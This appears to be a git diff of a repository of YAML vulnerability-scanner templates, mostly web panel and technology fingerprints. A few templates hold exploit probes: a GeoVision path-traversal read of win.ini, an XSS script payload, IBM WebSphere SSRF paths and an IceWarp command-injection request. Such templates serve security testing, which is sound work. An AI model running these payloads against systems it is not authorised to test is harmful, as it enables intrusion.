-
- type: word
name: yonyou-ufida-nc
words:
-
驭龙
-
- type: word
name: yulong-hids
words:
-
yulong - a cool hids system.
-
- type: word
name: yunanbao-yunxz
words:
- 'id=mtokenplugin width=0 height=0 style="position: absolute;left: 0px; top: 0px"'
-
- type: word
name: yuneasy-ipcalling
words:
- 云翌ip呼叫中心
-
- type: word
name: yunec
words:
- href="/17rec.html"
-
- type: word
name: yunhezi
words:
- ui/js/seaconfig.js
-
- type: word
name: yunhezi
words:
- ui/skins/black/style.css
-
- type: word
name: yunhezi
words:
- class="client-list dm-clear">
-
- type: word
name: yunkemail
words:
- action="/alimail/error/browserlog
-
- type: word
name: yunkemail
words:
- content="阿里企业邮箱
-
- type: word
name: yunsuo
words:
- href="http://bbs.yunsuo.com.cn
-
- type: word
name: yunsuo
words:
-
-
- type: word
name: zhongshengsoft-crm
words:
- clientutil.isff=!clientutil.isie
-
- type: word
name: zhongshengsoft-crm
words:
- alert("餐厅编号不能为空")
-
- type: word
name: zhongtan-ndstart
words:
- var pubnewsarray
-
- type: word
name: zhongtan-ndstart
words:
- "
南大之星信息发布系统 "
-
- type: word
name: zhongyou-system
words:
- background=zhongyou.jpg
-
- type: word
name: zhongyou-system
words:
- 众友科技巡检管理软件
-
- type: word
name: zhu-ji-bao
words:
- 您访问的是主机宝服务器默认页
-
- type: word
name: zhu-ji-bao
words:
- <a href="http://z.admin5.com/" target=
-
- type: word
name: zhuofansoft-cms
words:
- session.infocss.infocssurl
-
- type: word
name: zidesoft-e6
words:
- src="/static/images/login/btn-login.gif"
-
- type: word
name: ziguanghuayu-attendance-management-system
words:
- 广州紫光华宇信息技术有限公司
-
- type: word
name: zimbra
words:
- ImgZimbraIcon
-
- type: word
part: header
name: zimbra
words:
- "Set-Cookie: ZM_LOGIN_CSRF"
-
- type: word
name: zimbra
words:
- window._zimbramail
-
- type: word
name: zimbra
words:
- content="zimbra
-
- type: word
name: zipkin
words:
- <base href="/zipkin/">
-
- type: word
name: zizhujianzhan
words:
- content="模板系统xinnet
-
- type: word
name: zizhujianzhan
words:
- href="msnim:chat?contact=xinnet@hotmail.com
-
- type: word
name: zknet-attendance-management
words:
- 'onclick="showstate(gettext(''forgotten password'')) '
-
- type: word
condition: and
name: zknet-attendance-management
words:
- zknet
- zksoftware inc.
-
- type: word
name: zknet-attendance-management
words:
- web考勤管理系统
-
- type: word
condition: and
name: zkteco-security-management-system
words:
- src='/login/images/zksecurity.png'
- 百傲瑞达
-
- type: word
condition: and
name: zkteco-security-management-system
words:
- class="login-finger-btn disabled"
- id="password_hidden"
-
- type: word
name: zkteco-security-management-system
words:
- $(".copyright").text("copyright ? " + server_current_year + " zkteco co., ltd. all rights reserved");
-
- type: word
name: zkteco-system
words:
- class="m-btn zkgreen rnd"
-
- type: word
name: zkwell-corrosion-monitoring-and-corrosion-protection-management-system
words:
- background-image:url(images/devicebg.jpg)
-
- type: word
name: znv-digital-campus
words:
- list.asp?caseid=
-
- type: word
name: zoneminder
words:
- zoneminder login
-
- type: word
name: zonghousc-system
words:
- data-errormessage-value-missing="* 请录入用户名
-
- type: word
name: zonghousc-system
words:
- style/default/frui.css
-
- type: word
name: zoom-search-engine
words:
- name="zoom_query"
-
- type: word
name: zoommeeting
words:
- class="alert alert-success hideme zoom-newmessage"
-
- type: word
part: header
name: zope
words:
- "X-Powered-By: zope"
-
- type: word
condition: and
name: zotonic
words:
- /lib/js/apps/zotonic-1.0
- "powered by: zotonic"
-
- type: word
name: zte-police-research-system
words:
- 深圳市中兴信息技术有限公司版权所有
-
- type: word
name: zte-police-research-system
words:
- src="img/gonanlogo.jpg
-
- type: word
name: zuitu
words:
- help/zuitu.php
-
- type: word
name: zxoa
words:
- obj.src = "createcheckcode.aspx?id"+strmath;
-
- type: word
name: zxoa
words:
- name="button1" value="" onclick="javascript:return checkfrom();" id="button1" class="loginbtn" />
-
- type: word
name: zzcms
words:
- /inc/showuserlogin.php?style=h&t=math.random()
-
- type: word
name: zzsmit-public-bicycle-management-system
words:
- href="/skins/bicycle/css/login.css"
-
- type: word
name: zzzcms
words:
- Powered by <a href='http://zzzcms.com'>ZZZcms</a>
- - type: word
- name: bitwarden
- words:
- - <title page-title>Bitwarden Web Vault
-
- - type: word
- name: OpenBSD relayd
- part: header
- words:
- - "Server: OpenBSD httpd"
-
- - type: word
- name: Hunchentoot
- part: header
- words:
- - "Server: Hunchentoot"
-
- - type: word
- name: weblate
- words:
- - Weblate
- -
- condition: and
-
- - type: word
- name: Adobe Experience Manager (AEM)
- part: header
- words:
- - "x-dispatcher:"
- case-insensitive: true
-
-# digest: 4a0a00473045022100e28f74c69af652c367854dc369b14f824316aff2e7d606a11ce27b83eb00e079022036f335c41bb67fbbe860ec5a6e2152d9b99f836673aa2add3f6ebd7624f68097:922c64590222798bb761d5b6d8e72950
+# Enhanced by cs on 2022/02/08
diff --git a/poc/web/fortiweb-panel-7537.yaml b/poc/web/fortiweb-panel-7537.yaml
deleted file mode 100644
index 26e22e6e1f..0000000000
--- a/poc/web/fortiweb-panel-7537.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: fortiweb-login
-
-info:
- name: Fortinet FortiWeb Login Panel
- author: PR3R00T
- severity: info
- tags: panel
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/login"
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "Please login"
- - "ftnt-fortinet-grid"
- - "main-fortiweb.css"
- condition: and
- part: body
-
- - type: status
- status:
- - 200
diff --git a/poc/web/fortiweb-panel-7539.yaml b/poc/web/fortiweb-panel-7539.yaml
new file mode 100644
index 0000000000..566b562d83
--- /dev/null
+++ b/poc/web/fortiweb-panel-7539.yaml
@@ -0,0 +1,25 @@
+id: fortiweb-login
+
+info:
+ name: Fortinet FortiWeb Login Panel
+ author: PR3R00T
+ severity: info
+ tags: panel,fortinet,fortiweb,login
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/login"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Please login"
+ - "ftnt-fortinet-grid"
+ - "main-fortiweb.css"
+ condition: and
+ part: body
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/web/fortiweb-panel.yaml b/poc/web/fortiweb-panel.yaml
index 566b562d83..26e22e6e1f 100644
--- a/poc/web/fortiweb-panel.yaml
+++ b/poc/web/fortiweb-panel.yaml
@@ -4,7 +4,7 @@ info:
name: Fortinet FortiWeb Login Panel
author: PR3R00T
severity: info
- tags: panel,fortinet,fortiweb,login
+ tags: panel
requests:
- method: GET
diff --git a/poc/web/geovision-geowebserver-lfi-7597.yaml b/poc/web/geovision-geowebserver-lfi-7597.yaml
index 04caa40339..1f7a9f5453 100644
--- a/poc/web/geovision-geowebserver-lfi-7597.yaml
+++ b/poc/web/geovision-geowebserver-lfi-7597.yaml
@@ -1,18 +1,27 @@
id: geowebserver-lfi
+
info:
- name: GeoVision Geowebserver 5.3.3 - LFI
+ name: GeoVision Geowebserver 5.3.3 - Local File Inclusion
author: madrobot
severity: high
- description: A vulnerability in GeoVision Geowebserver allows remote unauthenticated attackers to disclose the content of locally stored files.
- reference: https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt
+ description: GeoVision Geowebserver 5.3.3 allows remote unauthenticated attackers to disclose the content of locally stored files via local file inclusion.
+ reference:
+ - https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cwe-id: CWE-22
tags: geowebserver,lfi
+
requests:
- method: GET
path:
- "{{BaseURL}}/Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini"
- "{{BaseURL}}/Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=aaa"
+
matchers-condition: and
matchers:
+
- type: word
words:
- "bit app support"
@@ -20,6 +29,9 @@ requests:
- "extensions"
condition: and
part: body
+
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/07/27
diff --git a/poc/web/geovision-geowebserver-lfi.yaml b/poc/web/geovision-geowebserver-lfi.yaml
new file mode 100644
index 0000000000..04caa40339
--- /dev/null
+++ b/poc/web/geovision-geowebserver-lfi.yaml
@@ -0,0 +1,25 @@
+id: geowebserver-lfi
+info:
+ name: GeoVision Geowebserver 5.3.3 - LFI
+ author: madrobot
+ severity: high
+ description: A vulnerability in GeoVision Geowebserver allows remote unauthenticated attackers to disclose the content of locally stored files.
+ reference: https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt
+ tags: geowebserver,lfi
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini"
+ - "{{BaseURL}}/Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=aaa"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "bit app support"
+ - "fonts"
+ - "extensions"
+ condition: and
+ part: body
+ - type: status
+ status:
+ - 200
diff --git a/poc/web/geovision-geowebserver-xss-7601.yaml b/poc/web/geovision-geowebserver-xss-7601.yaml
index 117a7c2b7e..ed9ed1315c 100644
--- a/poc/web/geovision-geowebserver-xss-7601.yaml
+++ b/poc/web/geovision-geowebserver-xss-7601.yaml
@@ -3,7 +3,7 @@ id: geowebserver-xss
info:
name: GeoVision Geowebserver 5.3.3 - Cross-Site Scripting
author: madrobot
- severity: high
+ severity: medium
description: GeoVision Geowebserver 5.3.3 and prior versions are vulnerable to several cross-site scripting / HTML injection / local file inclusion / XML injection / code execution vectors because the application fails to properly sanitize user requests.
reference:
- https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt
@@ -11,11 +11,9 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
- metadata:
- max-request: 1
- tags: geowebserver,xss,packetstorm
+ tags: geowebserver,xss
-http:
+requests:
- raw:
- |
GET /Visitor/bin/WebStrings.srf?file=&obj_name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
@@ -24,6 +22,7 @@ http:
matchers-condition: and
matchers:
+
- type: regex
regex:
- ""
@@ -38,4 +37,4 @@ http:
words:
- text/html
-# digest: 490a00463044022025d8e748d531bc0ad2980d78ab4449567d8b3e3160eba61cf84ed8ddbbe6e29402203230fdb94d1e407d979e7bedfb00b0db19a9e2300c0574ceba0ce48d498e0831:922c64590222798bb761d5b6d8e72950
+# Enhanced by mp on 2022/07/27
diff --git a/poc/web/geovision-geowebserver-xss.yaml b/poc/web/geovision-geowebserver-xss.yaml
new file mode 100644
index 0000000000..fd9c394cef
--- /dev/null
+++ b/poc/web/geovision-geowebserver-xss.yaml
@@ -0,0 +1,34 @@
+id: geowebserver-xss
+info:
+ name: GeoVision Geowebserver 5.3.3 - Cross-Site Scripting
+ author: madrobot
+ severity: medium
+ description: GeoVision Geowebserver 5.3.3 and prior versions are vulnerable to several cross-site scripting / HTML injection / local file inclusion / XML injection / code execution vectors because the application fails to properly sanitize user requests.
+ reference:
+ - https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cwe-id: CWE-22
+ tags: geowebserver,xss
+requests:
+ - raw:
+ - |
+ GET /Visitor/bin/WebStrings.srf?file=&obj_name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
+ Host: {{Hostname}}
+ Accept: */*
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - ""
+ part: body
+ - type: status
+ status:
+ - 200
+ - type: word
+ part: header
+ words:
+ - text/html
+
+# Enhanced by mp on 2022/07/27
diff --git a/poc/web/hashicorp-consul-webgui-7896.yaml b/poc/web/hashicorp-consul-webgui-7896.yaml
new file mode 100644
index 0000000000..e1601600b0
--- /dev/null
+++ b/poc/web/hashicorp-consul-webgui-7896.yaml
@@ -0,0 +1,32 @@
+id: hashicorp-consul-webgui
+info:
+ name: HashiCorp Consul WebGUI Detection
+ author: c-sh0
+ description: Detection of HashiCorp Consul WebGUI
+ severity: info
+ metadata:
+ shodan-query: http.title:"Consul by HashiCorp"
+ tags: consul,webserver,panel
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/ui/"
+ redirects: true
+ max-redirects: 2
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ part: body
+ words:
+ - '
Consul by HashiCorp'
+ - '%22%2C%22CONSUL_COPYRIGHT_URL%22%3A%22https%3A%2F%2Fwww.hashicorp.com%22'
+ condition: or
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - "CONSUL_VERSION:.*([0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})"
diff --git a/poc/web/hashicorp-consul-webgui-7897.yaml b/poc/web/hashicorp-consul-webgui-7897.yaml
deleted file mode 100644
index b20663df2f..0000000000
--- a/poc/web/hashicorp-consul-webgui-7897.yaml
+++ /dev/null
@@ -1,39 +0,0 @@
-id: hashicorp-consul-webgui
-
-info:
- name: HashiCorp Consul WebGUI Detection
- author: c-sh0
- description: Detection of HashiCorp Consul WebGUI
- severity: info
- metadata:
- shodan-query: http.title:"Consul by HashiCorp"
- tags: consul,webserver,panel
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/ui/"
-
- redirects: true
- max-redirects: 2
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
-
- - type: word
- part: body
- words:
- - '
Consul by HashiCorp'
- - '%22%2C%22CONSUL_COPYRIGHT_URL%22%3A%22https%3A%2F%2Fwww.hashicorp.com%22'
- condition: or
-
- extractors:
- - type: regex
- part: body
- group: 1
- regex:
- - "(CONSUL_VERSION:.*[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})"
-
-
diff --git a/poc/web/honeywell-web-controller.yaml b/poc/web/honeywell-web-controller.yaml
index fb14fa9b34..1386c6d5d6 100644
--- a/poc/web/honeywell-web-controller.yaml
+++ b/poc/web/honeywell-web-controller.yaml
@@ -1,23 +1,33 @@
-id: honeywell-web-controller
-
-info:
- name: Honeywell XL Web Controller
- author: dhiyaneshDK
- severity: info
- reference: https://www.exploit-db.com/ghdb/7130
- tags: panel
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/standard/default.php'
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - '
Honeywell XL Web Controller'
-
- - type: status
- status:
- - 200
+id: honeywell-web-controller
+
+info:
+ name: Honeywell Excel Web Control Login Panel - Detect
+ author: dhiyaneshDK
+ severity: info
+ description: Honeywell Excel Web Control login panel was detected.
+ reference:
+ - https://www.exploit-db.com/ghdb/7130
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+ cvss-score: 0
+ cwe-id: CWE-200
+ metadata:
+ max-request: 1
+ tags: edb,panel
+
+http:
+ - method: GET
+ path:
+ - '{{BaseURL}}/standard/default.php'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '
Honeywell XL Web Controller'
+
+ - type: status
+ status:
+ - 200
+
+# digest: 4a0a0047304502201cbade7e116f5a6461bc8f3247e57465c275928dd32e107dcd2fcef5007499e7022100a8805580e290eb54e4b1ce219ce329feda9ac13b5bec74addc47220b44738d15:922c64590222798bb761d5b6d8e72950
diff --git a/poc/web/ibm-mqseries-web-console.yaml b/poc/web/ibm-mqseries-web-console.yaml
index 198caba17c..286caeaaae 100644
--- a/poc/web/ibm-mqseries-web-console.yaml
+++ b/poc/web/ibm-mqseries-web-console.yaml
@@ -1,13 +1,21 @@
id: ibm-mqseries-web-console
info:
- name: IBM MQSeries web console
+ name: IBM MQ Web Console Login Panel - Detect
author: righettod
severity: info
- reference: https://www.ibm.com/docs/en/ibm-mq/9.0?topic=console-getting-started-mq
+ description: IBM MQ Web Console login panel was detected.
+ reference:
+ - https://www.ibm.com/docs/en/ibm-mq/9.0?topic=console-getting-started-mq
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+ cvss-score: 0
+ cwe-id: CWE-200
+ metadata:
+ max-request: 1
tags: panel,ibm
-requests:
+http:
- method: GET
path:
- '{{BaseURL}}/ibmmq/console/login.html'
@@ -17,6 +25,9 @@ requests:
- type: word
words:
- '
MQ Console'
+
- type: status
status:
- 200
+
+# digest: 4b0a00483046022100ec597f51733ccd985959151ca3feb7111e7c739affc3eb12916d18857dc00cbd022100a722921accf400d773a255d6562706e0f172bc4d5ade649fc5a9f909ad86a718:922c64590222798bb761d5b6d8e72950
diff --git a/poc/web/ibm-websphere-ssrf-8126.yaml b/poc/web/ibm-websphere-ssrf-8126.yaml
new file mode 100644
index 0000000000..777b9a5e06
--- /dev/null
+++ b/poc/web/ibm-websphere-ssrf-8126.yaml
@@ -0,0 +1,29 @@
+id: ibm-websphere-ssrf
+
+info:
+ name: IBM WebSphere Portal SSRF
+ author: pdteam
+ severity: high
+ reference:
+ - https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/
+ tags: ibm,ssrf,websphere
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/docpicker/internal_proxy/http/example.com'
+ - '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/example.com'
+
+ redirects: true
+ max-redirects: 2
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "
Example Domain"
\ No newline at end of file
diff --git a/poc/web/ibm-websphere-ssrf.yaml b/poc/web/ibm-websphere-ssrf.yaml
index 6e67a5db86..df664b9910 100644
--- a/poc/web/ibm-websphere-ssrf.yaml
+++ b/poc/web/ibm-websphere-ssrf.yaml
@@ -1,28 +1,24 @@
id: ibm-websphere-ssrf
-
info:
name: IBM WebSphere Portal SSRF
author: pdteam
severity: high
- reference: https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/
+ reference:
+ - https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/
tags: ibm,ssrf,websphere
-
requests:
- method: GET
path:
- '{{BaseURL}}/docpicker/internal_proxy/http/example.com'
- '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/example.com'
-
redirects: true
max-redirects: 2
stop-at-first-match: true
matchers-condition: and
matchers:
-
- type: status
status:
- 200
-
- type: word
words:
- - "
Example Domain"
\ No newline at end of file
+ - "
Example Domain"
diff --git a/poc/web/icewarp-webclient-rce-8132.yaml b/poc/web/icewarp-webclient-rce-8132.yaml
index 83dc457b00..caa8758541 100644
--- a/poc/web/icewarp-webclient-rce-8132.yaml
+++ b/poc/web/icewarp-webclient-rce-8132.yaml
@@ -1,16 +1,11 @@
id: icewarp-webclient-rce
info:
- name: IceWarp WebClient - Remote Code Execution
+ name: IceWarp WebClient RCE
author: gy741
severity: critical
- description: |
- IceWarp WebClient is susceptible to remote code execution.
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- cvss-score: 10.0
- cwe-id: CWE-77
tags: icewarp,rce
+ reference: https://www.pwnwiki.org/index.php?title=IceWarp_WebClient_basic_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
requests:
- raw:
@@ -24,12 +19,10 @@ requests:
matchers-condition: and
matchers:
- type: word
- part: body
words:
- "Microsoft Windows [Version"
+ part: body
- type: status
status:
- 302
-
-# Enhanced by mp on 2022/05/30
diff --git a/poc/web/icewarp-webclient-rce.yaml b/poc/web/icewarp-webclient-rce.yaml
deleted file mode 100644
index caa8758541..0000000000
--- a/poc/web/icewarp-webclient-rce.yaml
+++ /dev/null
@@ -1,28 +0,0 @@
-id: icewarp-webclient-rce
-
-info:
- name: IceWarp WebClient RCE
- author: gy741
- severity: critical
- tags: icewarp,rce
- reference: https://www.pwnwiki.org/index.php?title=IceWarp_WebClient_basic_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
-
-requests:
- - raw:
- - |
- POST /webmail/basic/ HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
-
- _dlg[captcha][target]=system(\'ver\')\
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "Microsoft Windows [Version"
- part: body
-
- - type: status
- status:
- - 302
diff --git a/poc/web/icinga-web-login-8136.yaml b/poc/web/icinga-web-login-8136.yaml
index b0383b79b2..5602ac406b 100644
--- a/poc/web/icinga-web-login-8136.yaml
+++ b/poc/web/icinga-web-login-8136.yaml
@@ -4,8 +4,8 @@ info:
name: Icinga Web 2 Login
author: dhiyaneshDK
severity: info
- reference:
- - https://www.shodan.io/search?query=http.title%3A%22Icinga+Web+2+Login%22
+ metadata:
+ shodan-query: http.title:"Icinga Web 2 Login"
tags: panel,icinga
requests:
diff --git a/poc/web/icinga-web-login-8137.yaml b/poc/web/icinga-web-login-8137.yaml
deleted file mode 100644
index 97f59206cb..0000000000
--- a/poc/web/icinga-web-login-8137.yaml
+++ /dev/null
@@ -1,20 +0,0 @@
-id: icinga-web-login
-info:
- name: Icinga Web 2 Login
- author: dhiyaneshDK
- severity: info
- reference:
- - https://www.shodan.io/search?query=http.title%3A%22Icinga+Web+2+Login%22
- tags: panel,icinga
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/authentication/login'
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "
Icinga Web 2 Login"
- - type: status
- status:
- - 200
diff --git a/poc/web/iplanet-web-server-8190.yaml b/poc/web/iplanet-web-server-8190.yaml
index 60f5c19673..e496eac963 100644
--- a/poc/web/iplanet-web-server-8190.yaml
+++ b/poc/web/iplanet-web-server-8190.yaml
@@ -1,21 +1,28 @@
id: iplanet-web-server
+
info:
name: Detect iPlanet Webserver Detection
author: pussycat0x
severity: info
- tags: tech,webserver
metadata:
- fofa-query: 'app="iPlanet-Web-Server,-Enterprise-Edition-4.1"'
-requests:
+ max-request: 1
+ fofa-query: app="iPlanet-Web-Server,-Enterprise-Edition-4.1"
+ tags: tech,webserver
+
+http:
- method: GET
path:
- "{{BaseURL}}"
+
matchers-condition: and
matchers:
- type: word
part: body
words:
- "iPlanet"
+
- type: status
status:
- 200
+
+# digest: 4a0a0047304502210085231abeb2eece3463a8001f3a5b066c5f5f30aa5823fbf2eb4b10520b79fb0702201d87c5ced6a65a59d948f624dbd2977a123af662c5f4cd755b61b60663cf4f53:922c64590222798bb761d5b6d8e72950
diff --git a/poc/web/iplanet-web-server-8191.yaml b/poc/web/iplanet-web-server-8191.yaml
index e496eac963..78c1d984a9 100644
--- a/poc/web/iplanet-web-server-8191.yaml
+++ b/poc/web/iplanet-web-server-8191.yaml
@@ -1,28 +1,21 @@
id: iplanet-web-server
-
info:
name: Detect iPlanet Webserver Detection
author: pussycat0x
severity: info
metadata:
- max-request: 1
fofa-query: app="iPlanet-Web-Server,-Enterprise-Edition-4.1"
tags: tech,webserver
-
-http:
+requests:
- method: GET
path:
- "{{BaseURL}}"
-
matchers-condition: and
matchers:
- type: word
part: body
words:
- "iPlanet"
-
- type: status
status:
- 200
-
-# digest: 4a0a0047304502210085231abeb2eece3463a8001f3a5b066c5f5f30aa5823fbf2eb4b10520b79fb0702201d87c5ced6a65a59d948f624dbd2977a123af662c5f4cd755b61b60663cf4f53:922c64590222798bb761d5b6d8e72950
diff --git a/poc/web/keenetic-web-login-8442.yaml b/poc/web/keenetic-web-login-8442.yaml
new file mode 100644
index 0000000000..0d24c5fc72
--- /dev/null
+++ b/poc/web/keenetic-web-login-8442.yaml
@@ -0,0 +1,19 @@
+id: keenetic-web-login
+info:
+ name: Keenetic Web Login
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/6817
+ tags: panel
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/login#goto=%2Fdashboard'
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '
Keenetic Web'
+ - type: status
+ status:
+ - 200
diff --git a/poc/web/keenetic-web-login-8443.yaml b/poc/web/keenetic-web-login-8443.yaml
deleted file mode 100644
index bc9aba324b..0000000000
--- a/poc/web/keenetic-web-login-8443.yaml
+++ /dev/null
@@ -1,22 +0,0 @@
-id: keenetic-web-login
-
-info:
- name: Keenetic Web Login
- author: dhiyaneshDK
- severity: info
- reference: https://www.exploit-db.com/ghdb/6817
- tags: panel,keenetic
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/login#goto=%2Fdashboard'
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - '
Keenetic Web'
- - type: status
- status:
- - 200
diff --git a/poc/web/keenetic-web-login.yaml b/poc/web/keenetic-web-login.yaml
index 0d24c5fc72..411cbcecb9 100644
--- a/poc/web/keenetic-web-login.yaml
+++ b/poc/web/keenetic-web-login.yaml
@@ -1,19 +1,33 @@
id: keenetic-web-login
+
info:
- name: Keenetic Web Login
+ name: Keenetic Web Login Panel - Detect
author: dhiyaneshDK
severity: info
- reference: https://www.exploit-db.com/ghdb/6817
- tags: panel
-requests:
+ description: Keenetic Web login panel was detected.
+ reference:
+ - https://www.exploit-db.com/ghdb/6817
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+ cvss-score: 0
+ cwe-id: CWE-200
+ metadata:
+ max-request: 1
+ tags: panel,keenetic,edb
+
+http:
- method: GET
path:
- '{{BaseURL}}/login#goto=%2Fdashboard'
+
matchers-condition: and
matchers:
- type: word
words:
- '
Keenetic Web'
+
- type: status
status:
- 200
+
+# digest: 4b0a00483046022100c9f30c7507ba5da08107a2c7ae51f8f3041ade0d4feee1076f33f9eb5a4ac44102210096fbe1684b9064c9ad4bfcbd5a977227647928abb213ceb280fd8edf6487be62:922c64590222798bb761d5b6d8e72950
diff --git a/poc/web/microsoft-teams-webhook-8856.yaml b/poc/web/microsoft-teams-webhook-8856.yaml
index a96a661eb0..8e6497e83d 100644
--- a/poc/web/microsoft-teams-webhook-8856.yaml
+++ b/poc/web/microsoft-teams-webhook-8856.yaml
@@ -3,7 +3,7 @@ info:
name: Microsoft Teams Webhook Disclosure
author: Ice3man
severity: info
- tags: exposure,token,microsoft
+ tags: exposure,token
requests:
- method: GET
path:
diff --git a/poc/web/microsoft-teams-webhook-8858.yaml b/poc/web/microsoft-teams-webhook-8858.yaml
new file mode 100644
index 0000000000..39343e0acd
--- /dev/null
+++ b/poc/web/microsoft-teams-webhook-8858.yaml
@@ -0,0 +1,22 @@
+id: microsoft-teams-webhook
+
+info:
+ name: Microsoft Teams Webhook Disclosure
+ author: Ice3man
+ severity: info
+ metadata:
+ max-request: 1
+ tags: exposure,token,microsoft
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - 'https://outlook\.office\.com/webhook/[A-Za-z0-9\-@]+/IncomingWebhook/[A-Za-z0-9\-]+/[A-Za-z0-9\-]+'
+
+# digest: 490a0046304402206592120fada86353a571916708cd7957ee72f02e6d555add96372a8ec0576f17022076099b3788e3ada4a5b70889edb2524c536a092a6e0fa9c60e473bfd66e09054:922c64590222798bb761d5b6d8e72950
diff --git a/poc/web/microweber-detect-8862.yaml b/poc/web/microweber-detect-8862.yaml
index 52947ee5a2..54aa646153 100644
--- a/poc/web/microweber-detect-8862.yaml
+++ b/poc/web/microweber-detect-8862.yaml
@@ -4,14 +4,12 @@ info:
name: Microweber Detect
author: princechaddha
severity: info
- reference:
- - https://github.com/microweber/microweber
+ reference: https://github.com/microweber/microweber
metadata:
- max-request: 1
- shodan-query: http.favicon.hash:780351152
+ shodan-query: 'http.favicon.hash:780351152'
tags: tech,microweber,oss
-http:
+requests:
- method: GET
path:
- "{{BaseURL}}"
@@ -26,5 +24,3 @@ http:
- type: status
status:
- 200
-
-# digest: 490a0046304402200d363b411e7ba5a9a8385045c6324b8b1e2ef7452bfefd53daa432ac4722c4f802200f8f8472e00aa021a7c47e526b5fdeeab111961625c1d715d9a7e550e1d948fa:922c64590222798bb761d5b6d8e72950
diff --git a/poc/web/microweber-detect-8863.yaml b/poc/web/microweber-detect.yaml
similarity index 100%
rename from poc/web/microweber-detect-8863.yaml
rename to poc/web/microweber-detect.yaml
diff --git a/poc/web/netsweeper-webadmin-detect-9066.yaml b/poc/web/netsweeper-webadmin-detect-9066.yaml
index 70603e15f4..ae772e0557 100644
--- a/poc/web/netsweeper-webadmin-detect-9066.yaml
+++ b/poc/web/netsweeper-webadmin-detect-9066.yaml
@@ -1,27 +1,15 @@
id: netsweeper-webadmin-detect
-
info:
- name: Netsweeper WebAdmin - Detect
